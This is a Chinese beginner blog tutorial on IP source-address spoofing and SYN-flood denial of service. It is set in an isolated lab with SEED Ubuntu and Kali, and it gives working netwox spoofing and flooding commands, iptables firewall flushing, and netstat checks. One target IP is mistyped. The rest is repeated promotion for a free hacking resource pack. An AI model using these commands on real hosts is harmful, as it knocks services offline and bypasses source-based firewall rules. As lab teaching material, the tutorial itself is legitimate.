【网络安全渗透测试零基础入门必知必会】之IP源地址欺骗与dos攻击,零基础入门到精通,收藏这一篇就够了

前言

这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段dos与ddos渗透与防御第1篇。

喜欢的朋友们,记得给大白点赞支持和收藏一下,关注我,学习黑客技术。

  • 靶机:seedubuntu 12.01,IP:192.168.199.134

  • 攻击机:Kali-2020.4,IP:192.168.199.129

  • 工具:netwox

IP地址欺骗

靶机开启tcpdump监听

sudo tcpdump -i eth0 tcp port 80 -n -nn  
  

配置防火墙,伪造许可的规则,222是我们伪造的ip

sudo iptables -A INPUT -i eth0 -s 192.168.199.222/32 -j ACCEPT  
sudo iptables -A INPUT -i eth0 -p all -j DROP  
  

在Kali上利用netwox进行IP地址欺骗,伪装成192.168.199.222,突破防火墙限制

netwox 52 -E "0:1:2:3:4:5" -I "192.168.199.222" -e "00:0c:29:6f:6a:d5" -i "192.168.199.134"  
  

  • -I:伪造的IP

  • -e:靶机MAC

  • -i:靶机IP

dos攻击

syn flood是建立在IP源地址欺骗之上的攻击

netwox 76 -i 19.168.199.134 -p 80  
  

此时靶机的80端口会接收到大量不同来源的syn包

使用netstat查看连接情况,在防火墙的作用下攻击并未成功

netstat -antu | grep :80  
  

接下来把防火墙关了,攻击成功,此时存在大量的syn半连接

iptables -F  
iptables -X  
  

netstat -antu | grep :80  
  

为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

[2024最新优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]


在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

[2024最新优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]
在这里插入图片描述

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

[2024最新优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值